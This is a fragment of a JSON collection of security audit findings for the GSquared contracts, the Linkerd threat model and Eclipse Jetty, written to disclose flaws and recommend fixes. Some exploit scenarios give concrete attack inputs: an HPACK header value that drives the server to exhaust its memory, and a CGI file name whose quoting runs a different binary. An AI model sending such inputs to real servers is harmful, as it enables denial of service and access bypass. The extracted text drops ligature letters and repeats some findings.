in the factor function will occur if the total supply of tranche tokens (junior or senior) is non-zero while the amount of assets backing those tokens is zero. Practically, this can happen only if the system is exposed to a loss large enough that the assets backing the junior tranche tokens are completely wiped. In this edge case, the factor function returns zero (gure 14.2). The subsequent division by zero in _calcTrancheValue will cause the transaction to revert. 525 526 527 528 529 function factor ( uint256 _totalAssets ) public view override returns ( uint256 ) 530 { 531 532 533 534 535 536 537 538 539 if (totalSupplyBase() == 0 ) { return getInitialBase(); } if (_totalAssets > 0 ) { return totalSupplyBase().mul(BASE).div(_totalAssets); } // This case is totalSupply > 0 && totalAssets == 0, and only occurs on system loss 540 541 } return 0 ; Figure 14.2: The factor function in GToken.sol#L525-541 It is important to note that if the system enters a state where there are no assets backing the junior tranche, junior tranche token holders would be unable to withdraw anyway. However, this division by zero should be caught in _calcTrancheValue , and the requisite error code should be thrown. Recommendations Short term, add a check before the division to ensure that factor is greater than zero. If factor is zero, throw a custom error code specically created for this situation. Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "15. Token withdrawals from GTranche are sent to the incorrect address ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The GTranche withdrawal function takes in a _recipient address to send the G3CRV shares to, but instead sends those shares to msg.sender (gure 15.1). 212 213 214 215 216 217 ) 218 219 220 221 { function withdraw ( uint256 _amount , uint256 _index , bool _tranche , address _recipient external override returns ( uint256 yieldTokenAmounts , uint256 calcAmount ) trancheToken.burn( msg.sender , factor, calcAmount); token.transfer( msg.sender , yieldTokenAmounts); . [...] . 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 } emit LogNewWithdrawal( msg.sender , _recipient, _amount, _index, _tranche, yieldTokenAmounts, calcAmount ); return (yieldTokenAmounts, calcAmount); Figure 15.1: The withdraw function in GTranche.sol#L219-259 Since GTranche withdrawals are performed by the GRouter contract on behalf of the user, the msg.sender and _recipient address are the same. However, a direct call to GTranche.withdraw by a user could lead to unexpected consequences. Recommendations Short term, change the destination address to _recipient instead of msg.sender . Long term, increase unit test coverage to include tests directly on GTranche and associated contracts in addition to performing the unit tests through the GRouter contract.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "16. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The GSquared Protocol contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. Security issues due to optimization bugs have occurred in the past . A medium- to high-severity bug in the Yul optimizer was introduced in Solidity version 0.8.13 and was xed only recently, in Solidity version 0.8.17 . Another medium-severity optimization bugone that caused memory writes in inline assembly blocks to be removed under certain conditions was patched in Solidity 0.8.15. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations causes a security vulnerability in the GSquared Protocol contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "1. Lack of rate-limiting mechanisms in the identity service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "The identity service issues signed certicates to sidecar proxies within Linkerd-integrated infrastructure. When proxies initialize for the rst time, they request a certicate from the identity service. However, the identity service lacks sucient rate-limiting mechanisms, which may make it prone to denial-of-service attacks. Because identity controllers are shared among pods in a cluster, a denial of service of an identity controller may aect the availability of applications across the cluster. Threat Scenario An attacker obtains access to the sidecar proxy in one of the user application namespaces. Due to the lack of rate-limiting mechanisms within the identity service, the proxy can now repeatedly request a newly signed certicate as if it were a proxy sidecar initializing for the rst time. Recommendations Short term, add rate-limiting mechanisms to the identity service to prevent a single pod from requesting too many certicates or performing other computationally intensive actions. Long term, ensure that appropriate rate-limiting mechanisms exist throughout the infrastructure to prevent denial-of-service attacks. Where possible, implement stricter access controls to ensure that components cannot interact with APIs more than necessary. Additionally, ensure that the system suciently logs events so that an audit trail is available in the event of an attack. 33 Linkerd Threat Model", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "2. Lack of rate-limiting mechanisms in the destination service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "The destination service contains trac-routing information for sidecar proxies within Linkerd-integrated infrastructure. However, the destination service lacks sucient rate-limiting mechanisms, which may make it prone to denial-of-service attacks if a pod repeatedly changes its availability status. Because destination controllers are shared among pods in a cluster, a denial of service of a destination controller may aect the availability of applications across the cluster. Threat Scenario An attacker obtains access to the sidecar proxy in one of the user application namespaces. Due to the lack of rate-limiting mechanisms within the destination service, the proxy can now repeatedly request routing information or change its availability status to force updates in the controller. Recommendations Short term, add rate-limiting mechanisms to the destination service to prevent a single pod from requesting too much routing information or performing state updates too quickly. Long term, ensure that appropriate rate-limiting mechanisms exist throughout the infrastructure to prevent denial-of-service attacks. Where possible, implement stricter access controls to ensure that components cannot interact with APIs more than necessary. Additionally, ensure that the system suciently logs events so that an audit trail is available in the event of an attack. 34 Linkerd Threat Model", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "3. CLI tool allows the use of insecure protocols when externally sourcing infrastructure denitions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "When using the command-line interface (CLI) tool, an operator may source infrastructural YAML denitions from a URI path specifying any protocol, such as http:// or https://. Therefore, a user could expose sensitive information when using an insecure protocol such as HTTP. Furthermore, the Linkerd documentation does not warn users about the systems use of insecure protocols. Threat Scenario An infrastructure operator integrates Linkerd into her infrastructure. When doing so, she uses the CLI tool to fetch YAML denitions over HTTP. Unbeknownst to her, the use of HTTP has made her data visible to attackers on the local network. Her data is also prone to man-in-the-middle attacks. Recommendations Short term, disallow the use of insecure protocols within the CLI tool when sourcing external data. Alternatively, provide documentation and best practices regarding the use of insecure protocols when externally sourcing data within the CLI tool. 35 Linkerd Threat Model 4. Exposure of admin endpoint may a\u0000ect application availability Severity: Medium Diculty: Medium Type: Awareness and Training Finding ID: TOB-LKDTM-4 Target: linkerd-proxy", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "5. Gos pprof endpoints enabled by default in all admin servers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "All core components of the Linkerd infrastructure, in both the data and control planes, have an admin server with Gos server runtime proler (pprof) endpoints on /debug/pprof enabled by default. These servers are not exposed to the rest of the cluster or to the local network by default. Threat Scenario An attacker scans the network in which a Linkerd cluster is congured and discovers that an operator forwarded the admin server port to the local network, exposing the pprof endpoints to the local network. He connects a proler to it and gains access to debug information, which assists him in mounting further attacks. Recommendations Short term, add a check to http.go that enables pprof endpoints only when Linkerd runs in debug or test mode. Long term, audit all debug-related functionality to ensure it is not exposed when Linkerd is running in production mode. References Your pprof is showing: IPv4 scans reveal exposed net/http/pprof endpoints 37 Linkerd Threat Model", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "6. Lack of access controls on the linkerd-viz dashboard ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "Linkerd operators can enable a set of metrics-focused features by adding the linkerd-viz extension. Doing so enables a web UI dashboard that lists detailed information about the namespaces, services, pods, containers, and other resources in a Kubernetes cluster in which Linkerd is congured. Operators can enable Kubernetes role-based access controls to the dashboard; however, no access control options are provided by Linkerd. Threat Scenario An attacker scans the network in which a Linkerd cluster is congured and discovers an exposed UI dashboard. By accessing the dashboard, she gains valuable insight into the cluster. She uses the knowledge gained from exploring the dashboard to formulate attacks that would expand her access to the network. Recommendations Short term, document recommendations for restructuring access to the linkerd-viz dashboard. Long term, add authentication and authorization controls for accessing the dashboard. This could be done by implementing tokens created via the CLI or client-side authorization logic. 38 Linkerd Threat Model", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "7. Prometheus endpoints reachable from the user application namespace ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "The linkerd-viz extension provides a Prometheus API that collects metrics data from the various proxies and controllers used by the control and data planes. Metrics can include various labels with IP addresses, pod IDs, and port numbers. Threat Scenario An attacker gains access to a user application pod and calls the API directly to read Prometheus metrics. He uses the API to gain information about the cluster that aids him in expanding his access across the Kubernetes infrastructure. Recommendations Short term, disallow access to the Prometheus extension from the user application namespace. This could be done in the same manner in which access to the web dashboard is restricted from within the cluster (e.g., by allowing access only for specic hosts). 39 Linkerd Threat Model", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "8. Lack of egress access controls ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "Linkerd provides access control mechanisms for ingress trac but not for egress trac. Egress controls would allow an operator to impose important restrictions, such as which external services and endpoints that a meshed application running in the application namespace can communicate with. Threat Scenario A user application becomes compromised. As a result, the application code begins making outbound requests to malicious endpoints. The lack of access controls on egress trac prevents infrastructure operators from mitigating the situation (e.g., by allowing the application to communicate with only a set of allowlisted external services). Recommendations Short term, add support for enforcing egress network policies. A GitHub issue to implement this recommendation already exists in the Linkerd repository. 40 Linkerd Threat Model", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "9. Prometheus endpoints are unencrypted and unauthenticated by default ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "The linkerd-viz extension provides a Prometheus API that collects metrics data from the various proxies and controllers used by the control and data planes. However, this endpoint is unencrypted and unauthenticated, lacking access and condentiality controls entirely. Threat Scenario An attacker gains access to a sibling component within the same namespace in which the Prometheus endpoint exists. Due to the lack of access controls, the attacker can now laterally obtain Prometheus metrics with ease. Additionally, due to the lack of condentiality controls, such as those implemented through the use of cryptography, connections are exposed to other parties. Recommendations Short term, consider implementing access controls within Prometheus and Kubernetes to disallow access to the Prometheus metrics endpoint from any machine within the cluster that is irrelevant to Prometheus logging. Additionally, implement secure encryption of connections with the use of TLS within Prometheus or leverage existing Linkerd mTLS schemes. 41 Linkerd Threat Model", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "10. Shared identity and destination services in a cluster poses risks to multi-application clusters ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "The identity and destination controllers are meant to convey certicate and routing information for proxies, respectively. However, only one identity controller and one destination controller are deployed in a cluster, so they are shared among all application pods within a cluster. As a result, a single application pod could pollute records, causing denial-of-service attacks or otherwise compromising these cluster-wide components. Additionally, a compromise of these cluster-wide components may result in the exposure of routing information for each application pod. Although the Kubernetes API server is exposed with the same architecture, it may be benecial to minimize the attack surface area and the data that can be exltrated from compromised Linkerd components. Threat Scenario An attacker gains access to a single user application pod and begins to launch attacks against the identity and destination services. As a result, these services cannot serve other user application pods. The attacker later nds a way to compromise one of these two services, allowing her to leak sensitive application trac from other user application pods. Recommendations Short term, implement per-pod identity and destination services that are isolated from other pods. If this is not viable, consider documenting this caveat so that users are aware of the risks of hosting multiple applications within a single cluster. 42 Linkerd Threat Model", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "11. Lack of isolation between components and their sidecar proxies ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "Within the Linkerd, linkerd-viz, and user application namespaces, each core component lives alongside a linkerd-proxy container, which proxies the components trac and provides mTLS for internal connections. However, because the sidecar proxies are not isolated from their corresponding components, the compromise of a component would mean the compromise of its proxy, and vice versa. This is particularly interesting when considering the lack of access controls for some components, as detailed in TOB-LKDTM-4: proxy admin endpoints are exposed to the applications they are proxying, allowing metrics collection and shutdown requests to be made. Threat Scenario An attacker exploits a vulnerability to gain access to a linkerd-proxy instance. As a result, the attacker is able to compromise the condentiality, integrity, and availability of lateral components, such as user applications, identity and destination services within the Linkerd namespace, and extensions within the linkerd-proxy namespace. Recommendations Short term, document system caveats and sensitivities so that operators are aware of them and can better defend themselves against attacks. Consider employing health checks that verify the integrity of proxies and other components to ensure that they have not been compromised. Long term, investigate ways to isolate sidecar proxies from the components they are proxying (e.g., by setting stricter access controls or leveraging isolated namespaces between proxied components and their sidecars). 43 Linkerd Threat Model", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "12. Lack of centralized security best practices documentation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "While security recommendations are included throughout Linkerds technical guidance documents, there is no centralized guidance on security best practices. Furthermore, the documentation on securing clusters lacks guidance on security best practices such as conguring timeouts and retries, authorization policy recommendations for defense in depth, and locking down access to linkerd-viz components. Threat Scenario A user is unaware of security best practices and congures Linkerd in an insecure manner. As a result, her Linkerd infrastructure is prone to attacks that could compromise the condentiality, integrity, and availability of data handled by the cluster. Recommendations Short term, develop centralized documentation on security recommendations with a focus on security-in-depth practices for users to follow. This guidance should be easy to locate should any user wish to follow security best practices when using Linkerd. 44 Linkerd Threat Model 13. Unclear distinction between Linkerd and Linkerd2 in o\u0000cial Linkerd blog post guidance Severity: Informational Diculty: Informational Type: Awareness and Training Finding ID: TOB-LKDTM-13 Target: Linkerd", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Informational" + ] + }, + { + "title": "3. CLI tool allows the use of insecure protocols when externally sourcing infrastructure denitions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "When using the command-line interface (CLI) tool, an operator may source infrastructural YAML denitions from a URI path specifying any protocol, such as http:// or https://. Therefore, a user could expose sensitive information when using an insecure protocol such as HTTP. Furthermore, the Linkerd documentation does not warn users about the systems use of insecure protocols. Threat Scenario An infrastructure operator integrates Linkerd into her infrastructure. When doing so, she uses the CLI tool to fetch YAML denitions over HTTP. Unbeknownst to her, the use of HTTP has made her data visible to attackers on the local network. Her data is also prone to man-in-the-middle attacks. Recommendations Short term, disallow the use of insecure protocols within the CLI tool when sourcing external data. Alternatively, provide documentation and best practices regarding the use of insecure protocols when externally sourcing data within the CLI tool. 35 Linkerd Threat Model", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "4. Exposure of admin endpoint may a\u0000ect application availability ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "User application sidecar proxies expose an admin endpoint that can be used for tasks such as shutting down the proxy server and collecting metrics. This endpoint is exposed to other components within the same pod. Therefore, an internal attacker could shut down the proxy, aecting the user applications availability. Furthermore, the admin endpoint lacks access controls, and the documentation does not warn of the risks of exposing the admin endpoint over the internet. Threat Scenario An infrastructure operator integrates Linkerd into his Kubernetes cluster. After a new user application is deployed, an underlying component within the same pod is compromised. An attacker with access to the compromised component can now laterally send a request to the admin endpoint used to shut down the proxy server, resulting in a denial of service of the user application. Recommendations Short term, employ authentication and authorization mechanisms behind the admin endpoint for proxy servers. Long term, document the risks of exposing critical components throughout Linkerd. For instance, it is important to note that exposing the admin endpoint on a user application proxy server may result in the exposure of a shutdown method, which could be leveraged in a denial-of-service attack. 36 Linkerd Threat Model", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "12. Lack of centralized security best practices documentation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "While security recommendations are included throughout Linkerds technical guidance documents, there is no centralized guidance on security best practices. Furthermore, the documentation on securing clusters lacks guidance on security best practices such as conguring timeouts and retries, authorization policy recommendations for defense in depth, and locking down access to linkerd-viz components. Threat Scenario A user is unaware of security best practices and congures Linkerd in an insecure manner. As a result, her Linkerd infrastructure is prone to attacks that could compromise the condentiality, integrity, and availability of data handled by the cluster. Recommendations Short term, develop centralized documentation on security recommendations with a focus on security-in-depth practices for users to follow. This guidance should be easy to locate should any user wish to follow security best practices when using Linkerd. 44 Linkerd Threat Model", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Informational" + ] + }, + { + "title": "13. Unclear distinction between Linkerd and Linkerd2 in o\u0000cial Linkerd blog post guidance ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "The ocial Linkerd documentation clearly indicates the version of Linkerd that each document pertains to. For instance, documentation specic to Linkerd 1.x displays a message stating, This is not the latest version of Linkerd! However, guidance documented in blog post form on the same site does not provide such information. For instance, the rst result of a Google search for Linkerd RBAC is a Linkerd blog post with guidance that is applicable only to linkerd 1.x, but there is no indication of this fact on the page. As a result, users who rely on these blog posts may misunderstand functionality in Linkerd versions 2.x and above. Threat Scenario A user searches for guidance on implementing various Linkerd features and nds documentation in blog posts that applies only to Linkerd version 1.x. As a result, he misunderstands Linkerd and its threat model, and he makes conguration mistakes that lead to security issues. Recommendations Short term, on Linkerd blog post pages, add indicators similar to the UI elements used in the Linkerd documentation to clearly indicate which version each guidance page applies to. 45 Linkerd Threat Model", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Informational" + ] + }, + { + "title": "14. Insu\u0000cient logging of outbound HTTPS calls ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", + "body": "Linkerd operators can use the linkerd-viz extensions such as Prometheus and Grafana to collect metrics for the various proxies in a Linkerd infrastructure. However, these extensions do not collect metrics on outbound calls made by meshed applications. This limits the data that operators could use to conduct incident response procedures if compromised applications reach out to malicious external services and servers. Threat Scenario A meshed application running in the data plane is compromised as a result of a supply chain attack. Because outbound HTTPS calls are not logged, Linkerd operators are unable to collect sucient data to determine the impact of the vulnerability. Recommendations Short term, implement logging for outbound HTTPS connections. A GitHub issue to implement this recommendation already exists in the Linkerd repository but is still unresolved as of this writing. 46 Linkerd Threat Model A. Methodology A threat modeling assessment is intended to provide a detailed analysis of the risks that an application faces at the structural and operational level; the goal is to assess the security of the applications design rather than its implementation details. During these assessments, engineers rely heavily on frequent meetings with the clients developers and on extensive reading of all documentation provided by the client. Code review and dynamic testing are not part of the threat modeling process, although engineers may occasionally consult the codebase or a live instance of the project to verify assumptions about the systems design. Engineers begin a threat modeling assessment by identifying the safeguards and guarantees that are critical to maintaining the target systems condentiality, integrity, and availability. These security controls dictate the assessments overarching scope and are determined by the requirements of the target system, which may relate to technical and reputational concerns, legal liability, and regulatory compliance. With these security controls in mind, engineers then divide the system into logical componentsdiscrete elements that perform specic tasksand establish trust zones around groups of components that lie within a common trust boundary. They identify the types of data handled by the system, enumerating the points at which data is sent, received, or stored by each component, as well as within and across trust boundaries. After establishing a detailed map of the target systems structure and data ows, engineers then identify threat actorsanyone who might threaten the targets security, including both malicious external actors and naive internal actors. Based on each threat actors initial privileges and knowledge, engineers then trace threat actor paths through the system, determining the controls and data that a threat actor might be able to improperly access, as well as the safeguards that prevent such access. Any viable attack path discovered during this process constitutes a nding, which is paired with design recommendations to remediate gaps in the systems defenses. Finally, engineers rate the strength of each security control, indicating the general robustness of that type of defense against the full spectrum of possible attacks. These ratings are provided in the Security Control Maturity Evaluation table. 47 Linkerd Threat Model B. Security Controls and Rating Criteria The following tables describe the security controls and rating criteria used in this report. Security Controls Category", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "1. Risk of integer overow that could allow HpackDecoder to exceed maxHeaderSize ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "An integer overow could occur in the MetaDataBuilder.checkSize function, which would allow HPACK header values to exceed their size limit. MetaDataBuilder.checkSize determines whether a header name or value exceeds the size limit and throws an exception if the limit is exceeded: public void checkSize ( int length, boolean huffman) throws SessionException { 291 292 293 294 295 296 297 _size + length, _maxSize); 298 } // Apply a huffman fudge factor if (huffman) length = (length * 4 ) / 3 ; if ((_size + length) > _maxSize) throw new HpackException.SessionException( \"Header too large %d > %d\" , Figure 1.1: MetaDataBuilder.checkSize However, when the value of length is very large and huffman is true , the multiplication of length by 4 in line 295 will overow, and length will become negative. This will cause the result of the sum of _size and length to be negative, and the check on line 296 will not be triggered. Exploit Scenario An attacker repeatedly sends HTTP messages with the HPACK header 0x00ffffffffff02 . Each time this header is decoded, the following occurs: HpackDecode.decode determines that a Human-coded value of length 805306494 needs to be decoded. 36 OSTIF Eclipse: Jetty Security Assessment MetaDataBuilder.checkSize approves this length. Huffman.decode allocates a 1.6 GB string array. Huffman.decode experiences a buer overow error, and the array is deallocated the next time garbage collection happens. (Note that this deallocation can be delayed by appending valid Human-coded characters to the end of the header.) Depending on the timing of garbage collection, the number of threads, and the amount of memory available on the server, this may cause the server to run out of memory. Recommendations Short term, have MetaDataBuilder.checkSize check that length is below a threshold before performing the multiplication. Long term, use fuzzing to check for similar errors; we found this issue by fuzzing HpackDecode . 37 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "2. Cookie parser accepts unmatched quotation marks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The RFC6265CookieParser.parseField function does not check for unmatched quotation marks. For example, parseField(\\) will execute without raising an exception. This issue is unlikely to lead to any vulnerabilities, but it could lead to problems if users or developers expect the function to accept only valid strings. Recommendations Short term, modify the function to check that the state at the end of the given string is not IN_QUOTED_VALUE . Long term, when using a state machine, ensure that the code always checks that the state is valid before exiting. 38 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. Errant command quoting in CGI servlet ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "If a user sends a request to a CGI servlet for a binary with a space in its name, the servlet will escape the command by wrapping it in quotation marks. This wrapped command, plus an optional command prex, will then be executed through a call to Runtime.exec . If the original binary name provided by the user contains a quotation mark followed by a space, the resulting command line will contain multiple tokens instead of one. For example, if a request references a binary called file name here , the escaping algorithm will generate the command line string file name here , which will invoke the binary named file , not the one that the user requested. if (execCmd.length() > 0 && execCmd.charAt( 0 ) != '\"' && execCmd.contains( \" \" )) execCmd = \"\\\"\" + execCmd + \"\\\"\" ; Figure 3.1: CGI.java#L337L338 Exploit Scenario The cgi-bin directory contains a binary named exec and a subdirectory named exec commands , which contains a le called bin1 . A user sends to the CGI servlet a request for the lename exec commands/bin1 . This request passes the le existence check on lines 194 through 205 in CGI.java . The servlet adds quotation marks around this lename, resulting in the command line string exec commands/bin1 . When this string is passed to Runtime.exec , instead of executing the bin1 binary, the server executes the exec binary with the argument commands/bin1 . This behavior is incorrect and could bypass alias checks; it could also cause other unintended behaviors if a command prex is congured. Additionally, if the useFullPath conguration setting is o, the command would not need to pass the existence check. Without this setting, an attacker exploiting this issue would not have to rely on a binary and subdirectory with similar names, and the attack could succeed on a much wider variety of directory structures. 39 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, update line 346 in CGI.java to replace the call to exec(String command, String[] env, File dir) with a call to exec(String[] cmdarray, String[] env, File dir) so that the quotation mark escaping algorithm does not create new tokens in the command line string. Long term, update the quotation mark escaping algorithm so that any unescaped quotation marks in the original name of the command are properly escaped, resulting in one double-quoted token instead of multiple adjacent quoted strings. Additionally, the expression execCmd.charAt(0) != '\"' on line 337 of CGI.java is intended to avoid adding additional quotation marks to an already-quoted command string. If this check is unnecessary, it should be removed. If it is necessary, it should be replaced by a more robust check that accurately detects properly formatted double-quoted strings. 40 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "4. Symlink-allowed alias checker ignores protected targets list ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The class SymlinkAllowedResourceAliasChecker is an alias checker that permits users to access a symlink as long as the symlink is stored within an allowed directory. The following comment appears on line 76 of this class: // TODO: return !getContextHandler().isProtectedTarget(realURI.toString()); Figure 4.1: SymlinkAllowedResourceAliasChecker.java#L76 As this comment suggests, the alias checker does not yet enforce the context handlers protected resource list. That is, if a symlink is contained in an allowed directory but points to a target on the protected resource list, the alias checker will return a positive match. During our review, we found that some other modules, but not all, independently enforce the protected resource list and will decline to serve resources on the list even if the alias checker returns a positive result. But the modules that do not independently enforce the protected resource list could serve protected resources to attackers conducting symlink attacks. Exploit Scenario An attacker induces the creation of a symlink (or a system administrator accidentally creates one) in a web-accessible directory that points to a protected resource (e.g., a child of WEB-INF ). By requesting this symlink through a servlet that uses the SymlinkAllowedResourceAliasChecker class, the attacker bypasses the protected resource list and accesses the sensitive les. Recommendations Short term, implement the check referenced in the comment so that the alias checker rejects symlinks that point to a protected resource or a child of a protected resource. Long term, consider clarifying and documenting the responsibilities of dierent components for enforcing protected resource lists. Consider implementing redundant checks in multiple modules for purposes of layered security. 41 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "5. Missing check for malformed Unicode escape sequences in QuotedStringTokenizer.unquote ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The QuotedStringTokenizer classs unquote method parses \\u#### Unicode escape sequences, but it does not rst check that the escape sequence is properly formatted or that the string is of a sucient length: case 'u' : b.append(( char )( (TypeUtil.convertHexDigit(( byte )s.charAt(i++)) << 24 ) + (TypeUtil.convertHexDigit(( byte )s.charAt(i++)) << 16 ) + (TypeUtil.convertHexDigit(( byte )s.charAt(i++)) << 8 ) + (TypeUtil.convertHexDigit(( byte )s.charAt(i++))) ) ); break ; Figure 5.1: QuotedStringTokenizer.java#L547L555 Any calls to this function with an argument ending in an incomplete Unicode escape sequence, such as str\\u0 , will cause the code to throw a java.lang.NumberFormatException exception. The only known execution path that will cause this method to be called with a parameter ending in an invalid Unicode escape sequence is to induce the processing of an ETag Matches header by the ResourceService class, which calls EtagUtils.matches , which calls QuotedStringTokenizer.unquote . Exploit Scenario An attacker introduces a maliciously crafted ETag into a browsers cache. Each subsequent request for the aected resource causes a server-side exception, preventing the server from producing a valid response so long as the cached ETag remains in place. Recommendations Short term, add a try-catch block around the aected code that drops malformed escape sequences. 42 OSTIF Eclipse: Jetty Security Assessment Long term, implement a suitable workaround for lenient mode that passes the raw bytes of the malformed escape sequence into the output. 43 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "6. WebSocket frame length represented with 32-bit integer ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The WebSocket standard (RFC 6455) allows for frames with a size of up to 2 64 bytes. However, the WebSocket parser represents the frame length with a 32-bit integer: private int payloadLength; // ...[snip]... case PAYLOAD_LEN_BYTES: { } byte b = buffer.get(); --cursor; payloadLength |= (b & 0xFF ) << ( 8 * cursor); // ...[snip]... Figure 6.1: Parser.java , lines 57 and 147151 As a result, this parsing algorithm will incorrectly parse some length elds as negative integers, causing a java.lang.IllegalArgumentException exception to be thrown when the parser tries to set the limit of a Buffer object to a negative number (refer to TOB-JETTY-7 ). Consequently, Jettys WebSocket implementation cannot properly process frames with certain lengths that are compliant with RFC 6455. Even if no exception results, this logic error will cause the parser to incorrectly identify the sizes of WebSocket frames and the boundaries between them. If the server passes these frames to another WebSocket connection, this bug could enable attacks similar to HTTP request smuggling, resulting in bypasses of security controls. Exploit Scenario A Jetty WebSocket server is deployed in a reverse proxy conguration in which both Jetty and another web server parse the same stream of WebSocket frames. An attacker sends a frame with a length that the Jetty parser incorrectly truncates to a 32-bit integer. Jetty and the other server interpret the frames dierently, which causes errors in the implementation of security controls, such as WAF lters. 44 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, change the payloadLength variable to use the long data type instead of an int . Long term, audit all arithmetic operations performed on this payloadLength variable to ensure that it is always used as an unsigned integer instead of a signed one. The standard librarys Integer class can provide this functionality. 45 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "7. WebSocket parser does not check for negative payload lengths ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The WebSocket parsers checkFrameSize method checks for payload lengths that exceed the current congurations maximum, but it does not check for payload lengths that are lower than zero. If the payload length is lower than zero, the code will throw an exception when the payload length is passed to a call to buffer.limit . Exploit Scenario An attacker sends a WebSocket payload with a length eld that parses to a negative signed integer (refer to TOB-JETTY-6 ). This payload causes an exception to be thrown and possibly the server process to crash. Recommendations Short term, update checkFrameSize to throw an org.eclipse.jetty.websocket.core.exception.ProtocolException exception if the frames length eld is less than zero. 46 OSTIF Eclipse: Jetty Security Assessment 8. WebSocket parser greedily allocates ByteBu\u0000ers for large frames 